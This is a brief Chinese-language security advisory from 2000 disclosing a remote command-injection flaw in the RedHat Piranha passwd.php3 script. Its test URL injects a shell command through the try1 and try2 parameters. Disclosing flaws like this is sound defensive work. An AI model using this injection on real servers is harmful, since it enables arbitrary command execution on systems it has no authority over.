RedHat Piranha passwd.php3可以远程执行命令发布时间:2000-04-26 更新时间:2000-04-26 严重程度:中 威胁程度:普通用户访问权限 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Linux详细描述 RehHat Piranha Virtual Server package的 passwd.php3 脚本存在一安全漏洞,由于对输入缺少切当的检查,所以允许远程用户可以执行任意命令,命令以WEB 服务器的ID命令来运行。 测试代码 http://victim.example.com/piranha/secure/passwd.p hp3?try1=g23+%3B+touch+%2Ftmp%2Fr00ted+% 3B&try2=g23+%3B+touch+%2Ftmp%2Fr00ted+% 3B&passwd=ACCEPT 将在/tmp目录下touch一r00ted文件。 解决方案 暂无 相关信息 |
